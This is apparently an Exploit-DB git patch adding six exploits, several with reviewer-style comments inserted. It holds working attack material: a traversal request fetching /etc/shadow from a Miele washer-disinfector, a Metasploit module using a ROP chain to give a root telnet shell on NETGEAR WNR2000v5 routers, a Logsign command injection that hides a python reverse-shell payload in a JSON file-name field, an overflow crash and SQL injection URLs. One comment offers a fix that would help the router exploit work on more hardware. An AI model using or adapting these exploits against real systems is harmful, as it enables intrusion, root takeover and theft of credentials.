From 570f8aec26656078e30bbeab4f24dad6fce49782 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 25 Mar 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-03-25 6 new exploits wifirxpower - Local Buffer Overflow Miele Professional PG 8528 - Directory Traversal NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit) Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit) Gr8 Tutorial Script - SQL Injection Gr8 Gallery Script - SQL Injection --- files.csv | 6 + platforms/hardware/remote/41718.txt | 69 +++++++ platforms/hardware/remote/41719.rb | 270 ++++++++++++++++++++++++++++ platforms/linux/dos/41715.txt | 141 +++++++++++++++ platforms/php/webapps/41716.txt | 19 ++ platforms/php/webapps/41717.txt | 19 ++ platforms/python/remote/41720.rb | 77 ++++++++ 7 files changed, 601 insertions(+) create mode 100755 platforms/hardware/remote/41718.txt create mode 100755 platforms/hardware/remote/41719.rb create mode 100755 platforms/linux/dos/41715.txt create mode 100755 platforms/php/webapps/41716.txt create mode 100755 platforms/php/webapps/41717.txt create mode 100755 platforms/python/remote/41720.rb
diff --git a/files.csv b/files.csv
index dbb87a56d..4ffd1f27e 100644
--- a/files.csv
+++ b/files.csv
@@ -5424,6 +5424,7 @@ id,file,description,date,author,platform,type,port
 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
+41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15384,6 +15385,9 @@ id,file,description,date,author,platform,type,port
 41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)",2003-03-07,Metasploit,multiple,remote,0
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
+41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
+41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
+41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37621,3 +37625,5 @@ id,file,description,date,author,platform,type,port
 41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
+41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
+41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/hardware/remote/41718.txt b/platforms/hardware/remote/41718.txt
new file mode 100755
index 000000000..dfeb1b5ae
--- /dev/null
+++ b/platforms/hardware/remote/41718.txt
@@ -0,0 +1,69 @@
+Title:
+======
+Miele Professional PG 8528 - Web Server Directory Traversal
+
+Author:
+=======
+Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+
+CVE-ID:
+=======
+CVE-2017-7240
+
+Risk Information:
+=================
+Risk Factor: Medium
+CVSS Base Score: 5.0
+CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
+CVSS Temporal Vector: CVSS2#E:POC/RL:OF/RC:C
+CVSS Temporal Score: 3.9
+
+Timeline:
+=========
+2016-11-16 Vulnerability discovered
+2016-11-10 Asked for security contact
+2016-11-21 Contact with Miele product representative
+2016-12-03 Send details to the Miele product representative
+2017-01-19 Asked for update, no response
+2017-02-03 Asked for update, no response
+2017-03-23 Public disclosure
+
+Status:
+=======
+Published
+
+Affected Products:
+==================
+Miele Professional PG 8528 (washer-disinfector) with ethernet interface.
+
+Vendor Homepage:
+================
+https://www.miele.co.uk/professional/large-capacity-washer-disinfectors-560.htm?mat=10339600&name=PG_8528
+
+Details:
+========
+The corresponding embeded webserver "PST10 WebServer" typically listens to port 80 and is prone to a directory traversal attack, therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks.
+
+Proof of Concept:
+=================
+~$ telnet 192.168.0.1 80
+Trying 192.168.0.1...
+Connected to 192.168.0.1.
+Escape character ist '^]'.
+GET /../../../../../../../../../../../../etc/shadow HTTP/1.1
+
+HTTP/1.1 200 OK
+Date: Wed, 16 Nov 2016 11:58:50 GMT
+Server: PST10 WebServer
+Content-Type: application/octet-stream
+Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
+Content-disposition: attachment; filename="./etc/shadow"
+Accept-Ranges: bytes
+Content-Length: 52
+
+root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::
+
+Fix:
+====
+We are not aware of an actual fix.
+
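Review bot: The timeline in 41718.txt is out of order: `2016-11-10 Asked for security contact` precedes `2016-11-16 Vulnerability discovered`, so one of the two dates is presumably a typo and should be corrected before anyone relies on it to reconstruct the disclosure window. The Fix section only says that no fix is known; since the flaw is an unauthenticated file read on an embedded web server, the advisory would be more useful to operators if it stated the interim mitigation, namely keeping the device's Ethernet interface on a segregated network not reachable from untrusted hosts, and that request paths containing `../` sequences toward the device are a clear detection signal. Minor wording in the Details paragraph: "embeded" should be "embedded" and "aide" should be "aid".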
diff --git a/platforms/hardware/remote/41719.rb b/platforms/hardware/remote/41719.rb
new file mode 100755
index 000000000..0c8f583c8
--- /dev/null
+++ b/platforms/hardware/remote/41719.rb
@@ -0,0 +1,270 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'time' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::CRand + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow', + 'Description' => %q{ + The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi + parameter. + In order to exploit it, it is necessary to guess the value of a certain timestamp which + is in the configuration of the router. An authenticated attacker can simply fetch this + from a page, but an unauthenticated attacker has to brute force it. + Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but + it is guaranteed that it can be bruteforced. + This module implements both modes, and it works very reliably. It has been tested with + the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware + revisions v4 and v3, but this has not been tested - with these routers it might be necessary + to adjust the LibcBase variable as well as the gadget addresses. 
+ }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => ['unix'], + 'References' => + [ + ['CVE', '2016-10174'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'], + ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability'] + ], + 'Targets' => + [ + [ 'NETGEAR WNR2000v5', + { + 'LibcBase' => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so) + 'SystemOffset' => 0x547D0, + 'GadgetOffset' => 0x2462C, + #The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()): + #LOAD:0002462C addiu $a0, $sp, 0x40+arg_0 + #LOAD:00024630 move $t9, $s0 + #LOAD:00024634 jalr $t9 + 'Payload' => + { + 'BadChars' => "\x00\x25\x26", + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + } + ], + ], + 'Privileged' => true, + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DisclosureDate' => 'Dec 20 2016', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(80), + OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']), + OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']), + ], self.class) + register_advanced_options( + [ + OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]), + OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200]) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + if res && res.headers['WWW-Authenticate'] + auth = res.headers['WWW-Authenticate'] + 
if auth =~ /WNR2000v5/ + return Exploit::CheckCode::Detected + elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ + return Exploit::CheckCode::Unknown + end + end + Exploit::CheckCode::Safe + end + + def uri_encode (str) + "%" + str.scan(/.{2}|.+/).join("%") + end + + def calc_address (libc_base, offset) + addr = (libc_base + offset).to_s(16) + uri_encode(addr) + end + + def get_current_time + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + if res && res['Date'] + date = res['Date'] + return Time.parse(date).strftime('%s').to_i + end + end + + def get_auth_timestamp + res = send_request_raw({ + 'uri' => '/lang_check.html', + 'method' => 'GET', + # automatically uses HttpPassword and HttpUsername to authenticate + }) + if res && res.code == 401 + # try again, might fail the first time + res = send_request_raw({ + 'uri' => '/lang_check.html', + 'method' => 'GET', + # automatically uses HttpPassword and HttpUsername to authenticate + }) + end + if res && res.code == 200 + if res.body =~ /timestamp=([0-9]{8})/ + $1.to_i + end + end + end + + # Do some crazyness to force Ruby to cast to a single-precision float and + # back to an integer. + # This emulates the behaviour of the soft-fp library and the float cast + # which is done at the end of Netgear's timestamp generator. + def ieee754_round (number) + [number].pack('f').unpack('f*')[0].to_i + end + + + # This is the actual algorithm used in the get_timestamp function in + # the Netgear firmware. 
+ def get_timestamp(time) + srandom_r time + t0 = random_r + t1 = 0x17dc65df; + hi = (t0 * t1) >> 32; + t2 = t0 >> 31; + t3 = hi >> 23; + t3 = t3 - t2; + t4 = t3 * 0x55d4a80; + t0 = t0 - t4; + t0 = t0 + 0x989680; + + ieee754_round(t0) + end + + def get_payload + rand_text_alpha(36) + # filler_1 + calc_address(target['LibcBase'], target['SystemOffset']) + # s0 + rand_text_alpha(12) + # s1, s2 and s3 + calc_address(target['LibcBase'], target['GadgetOffset']) + # gadget + rand_text_alpha(0x40) + # filler_2 + "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload + end + + def send_req(timestamp) + begin + uri_str = (timestamp == nil ? \ + "/apply_noauth.cgi?/lang_check.html" : \ + "/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}") + res = send_request_raw({ + 'uri' => uri_str, + 'method' => 'POST', + 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, + 'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}" + }) + rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + return + end + end + + def exploit + # 1: try to see if the default admin username and password are set + timestamp = get_auth_timestamp + + # 2: now we try two things at once: + # one, if the timestamp is not nil then we got an authenticated timestamp, let's try that + # two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before) + print_status("#{peer} - Trying the easy way out first") + send_req(timestamp) + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) + if not sock.nil? 
+ print_good("#{peer} - Success, shell incoming!") + return handler(sock) + end + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + end + + print_bad("#{peer} - Well that didn't work... let's do it the hard way.") + + # no shell? let's just go on and bruteforce the timestamp + # 3: get the current date from the router and parse it + end_time = get_current_time + if end_time.nil? + fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time") + end + if end_time <= datastore['TIME_OFFSET'] + start_time = 0 + else + start_time = end_time - datastore['TIME_OFFSET'] + end + end_time += datastore['TIME_SURPLUS'] + + if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i + end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i + end + + print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.") + print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).") + + # 2: work back from the current router time minus datastore['TIME_OFFSET'] + while true + for time in end_time.downto(start_time) + timestamp = get_timestamp(time) + sleep 0.1 + if time % 400 == 0 + print_status("#{peer} - Still working, trying time #{time}") + end + send_req(timestamp) + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) + if sock.nil? 
+ next + end + print_status("#{peer} - Success, shell incoming!") + return handler(sock) + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + next + end + end + end_time = start_time + start_time -= datastore['TIME_OFFSET'] + if start_time < 0 + if end_time <= datastore['TIME_OFFSET'] + fail_with(Failure::Unknown, "#{peer} - Exploit failed.") + end + start_time = 0 + end + print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}") + + # let the router clear the buffers a bit... + sleep 30 + end + end +end \ No newline at end of file diff --git a/platforms/linux/dos/41715.txt b/platforms/linux/dos/41715.txt new file mode 100755 index 000000000..6dfef4b3f --- /dev/null +++ b/platforms/linux/dos/41715.txt 
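Review bot: `calc_address` in 41719.rb derives each encoded ROP address from `(libc_base + offset).to_s(16)`, which is not zero-padded, so any sum below 0x10000000 yields seven hex digits and `uri_encode`'s `scan(/.{2}|.+/)` then emits a single-nibble `%X` escape that misaligns everything after it; `(libc_base + offset).to_s(16).rjust(8, '0')` pins the width. This cannot bite the shipped WNR2000v5 target (both sums are eight digits), but the description explicitly invites adjusting `LibcBase` for v3/v4 hardware, which is exactly when the padding matters. In `exploit`, `while true` and `for time in end_time.downto(start_time)` read more idiomatically as `loop do` and `end_time.downto(start_time) do |time|`, and the rescued exception bound to `e` in `send_req` and both rescue clauses of `exploit` is never used, so it can be dropped or named `_e`. `get_auth_timestamp` should take the capture via `Regexp.last_match(1)` rather than `$1`, `get_current_time`'s `Time.parse(date).strftime('%s').to_i` is just `Time.parse(date).to_i`, and the trailing semicolons in `get_timestamp` are harmless but not Ruby style.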
@@ -0,0 +1,141 @@ +[+] Title: wifirxpower - Local Stack Based Buffer Overflow +[+] Credits / Discovery: Nassim Asrir +[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ +[+] Author Company: Henceforth +[+] CVE: N/A + +Vendor: +=============== + +https://github.com/cnlohr/wifirxpower + + +Download: +=========== + +https://github.com/cnlohr/wifirxpower + + +Vulnerability Type: +=================== + +Local Stack Based Buffer Overflow + + +issue: +=================== + +'wifirx.c' contain a vulnerable code in the line '111' the developer use the 'strcpy' function and does not check the buffer destination and cause a Stack Oveflow. + +Vulnerable Code (102 - 124) wifirx.c: +=================== +int GetQuality( const char * interface, int * noise ) +{ + int sockfd; + struct iw_statistics stats; + struct iwreq req; + + + memset(&stats, 0, sizeof(stats)); + memset(&req, 0, sizeof(struct iwreq)); + strcpy( req.ifr_name, interface ); + req.u.data.pointer = &stats; + req.u.data.length = sizeof(struct iw_statistics); +#ifdef CLEAR_UPDATED + req.u.data.flags = 1; +#endif + + /* Any old socket will do, and a datagram socket is pretty cheap */ + if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { + if( first ) perror("Could not create simple datagram socket"); + first = 0; + //exit(EXIT_FAILURE); + return -1; + } + + +Exploit: +========= + +1 - ./wifirx aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa + +2 - r $(python -c 'print"A"*41') + +Backtrace: +========= +/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff6ec3e37] +/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x0)[0x7ffff6ec3e00] +/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401aaa] +/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401d21] +/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7ffff6ddb7ed] +/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401449] + +Memory Map: +=========== +00606000-0062a000 rw-p 00000000 00:00 0 [heap] +7ffff6379000-7ffff638e000 
r-xp 00000000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1 +7ffff638e000-7ffff658d000 ---p 00015000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1 +7ffff658d000-7ffff658e000 r--p 00014000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1 +7ffff658e000-7ffff658f000 rw-p 00015000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1 +7ffff658f000-7ffff6594000 r-xp 00000000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 +7ffff6594000-7ffff6793000 ---p 00005000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 +7ffff6793000-7ffff6794000 r--p 00004000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 +7ffff6794000-7ffff6795000 rw-p 00005000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 +7ffff6795000-7ffff6797000 r-xp 00000000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 +7ffff6797000-7ffff6996000 ---p 00002000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 +7ffff6996000-7ffff6997000 r--p 00001000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 +7ffff6997000-7ffff6998000 rw-p 00002000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 +7ffff6998000-7ffff699a000 r-xp 00000000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so +7ffff699a000-7ffff6b9a000 ---p 00002000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so +7ffff6b9a000-7ffff6b9b000 r--p 00002000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so +7ffff6b9b000-7ffff6b9c000 rw-p 00003000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so +7ffff6b9c000-7ffff6bb9000 r-xp 00000000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 +7ffff6bb9000-7ffff6db8000 ---p 0001d000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 +7ffff6db8000-7ffff6db9000 r--p 0001c000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 +7ffff6db9000-7ffff6dba000 rw-p 0001d000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 +7ffff6dba000-7ffff6f6e000 r-xp 00000000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so +7ffff6f6e000-7ffff716d000 ---p 
001b4000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so +7ffff716d000-7ffff7171000 r--p 001b3000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so +7ffff7171000-7ffff7173000 rw-p 001b7000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so +7ffff7173000-7ffff7178000 rw-p 00000000 00:00 0 +7ffff7178000-7ffff7188000 r-xp 00000000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 +7ffff7188000-7ffff7387000 ---p 00010000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 +7ffff7387000-7ffff7388000 r--p 0000f000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 +7ffff7388000-7ffff7389000 rw-p 00010000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 +7ffff7389000-7ffff738b000 r-xp 00000000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 +7ffff738b000-7ffff758a000 ---p 00002000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 +7ffff758a000-7ffff758b000 r--p 00001000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 +7ffff758b000-7ffff758c000 rw-p 00002000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 +7ffff758c000-7ffff75a4000 r-xp 00000000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so +7ffff75a4000-7ffff77a3000 ---p 00018000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so +7ffff77a3000-7ffff77a4000 r--p 00017000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so +7ffff77a4000-7ffff77a5000 rw-p 00018000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so +7ffff77a5000-7ffff77a9000 rw-p 00000000 00:00 0 +7ffff77a9000-7ffff78a4000 r-xp 00000000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so +7ffff78a4000-7ffff7aa3000 ---p 000fb000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so +7ffff7aa3000-7ffff7aa4000 r--p 000fa000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so +7ffff7aa4000-7ffff7aa5000 rw-p 000fb000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so +7ffff7aa5000-7ffff7bd5000 r-xp 00000000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 
+7ffff7bd5000-7ffff7dd5000 ---p 00130000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 +7ffff7dd5000-7ffff7dd6000 r--p 00130000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 +7ffff7dd6000-7ffff7dda000 rw-p 00131000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 +7ffff7dda000-7ffff7dfc000 r-xp 00000000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so +7ffff7fd5000-7ffff7fdb000 rw-p 00000000 00:00 0 +7ffff7ff7000-7ffff7ffb000 rw-p 00000000 00:00 0 +7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] +7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so +7ffff7ffd000-7ffff7fff000 rw-p 00023000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so +7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] +ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] + + +Tested on: +=============== + +Linux Ubuntu x86_64 + + + + + + diff --git a/platforms/php/webapps/41716.txt b/platforms/php/webapps/41716.txt new file mode 100755 index 000000000..b1a44be2f --- /dev/null +++ b/platforms/php/webapps/41716.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Gr8 Tutorial Script - SQL Injection +# Google Dork: N/A +# Date: 24.03.2017 +# Vendor Homepage: http://gr8script.com/ +# Software: http://gr8script.com/gr8_tutorial_script.php +# Demo: http://www.gr8script.com/gr8tutorial/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/users.php?user=[SQL] +# http://localhost/[PATH]/track/54[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41717.txt b/platforms/php/webapps/41717.txt new file mode 100755 index 000000000..14429e9bc --- /dev/null +++ b/platforms/php/webapps/41717.txt 
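Review bot: The backtrace in 41715.txt has `__fortify_fail` at the top of the stack, which means the oversized `strcpy` into `req.ifr_name` was caught by glibc's `_FORTIFY_SOURCE` check (most likely via `__strcpy_chk`) and the process aborted; what the advisory demonstrates is therefore a crash, consistent with the `dos` classification, and the text should say so rather than leaving "Local Stack Based Buffer Overflow" to imply control of execution. Impact is further bounded by the fact that the overflowing string is the program's own command-line argument, so no privilege boundary is crossed unless `wifirx` were installed setuid, which the advisory does not claim. There is no fix section at all; `ifr_name` is an `IFNAMSIZ`-byte field, so the copy should be bounded, e.g. `strncpy(req.ifr_name, interface, IFNAMSIZ - 1); req.ifr_name[IFNAMSIZ - 1] = '\0';`, or the interface argument's length rejected before the call. The title inside the file ("Local Stack Based Buffer Overflow") and the files.csv entry ("Local Buffer Overflow") also disagree and should be reconciled.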
@@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Gr8 Gallery Script - SQL Injection +# Google Dork: N/A +# Date: 24.03.2017 +# Vendor Homepage: http://gr8script.com/ +# Software: http://gr8script.com/gr8gallery.php +# Demo: http://www.gr8script.com/gr8gallery/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/video-gallery/X[SQL] +# http://localhost/[PATH]/photo-gallery/X[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/python/remote/41720.rb b/platforms/python/remote/41720.rb new file mode 100755 index 000000000..59c4adfcb --- /dev/null +++ b/platforms/python/remote/41720.rb 
@@ -0,0 +1,77 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Logsign Remote Command Injection', + 'Description' => %q{ + This module exploits an command injection vulnerability in Logsign. + By exploiting this vulnerability, unauthenticated users can execute + arbitrary code under the root user. + + Logsign has a publicly accessible endpoint. That endpoint takes a user + input and then use it during operating system command execution without + proper validation. + + This module was tested against 4.4.2 and 4.4.137 versions. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/'] + ], + 'Privileged' => true, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'DefaultOptions' => + { + 'payload' => 'python/meterpreter/reverse_tcp' + }, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => 'Feb 26 2017', + 'DefaultTarget' => 0 + )) + + end + + def check + p_hash = {:file => "#{rand_text_alpha(15 + rand(4))}.raw"} + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'), + 'ctype' => 'application/json', + 'data' => JSON.generate(p_hash) + ) + + if res && res.body.include?('{"message": "success", "success": true}') + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + print_status("Delivering payload...") + + p_hash = {:file => "logsign.raw\" quit 2>&1 |python -c \"#{payload.encoded}\" #"} + + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api', 
'log_browser', 'validate'), + 'ctype' => 'application/json', + 'data' => JSON.generate(p_hash) + ) + end +end \ No newline at end of file
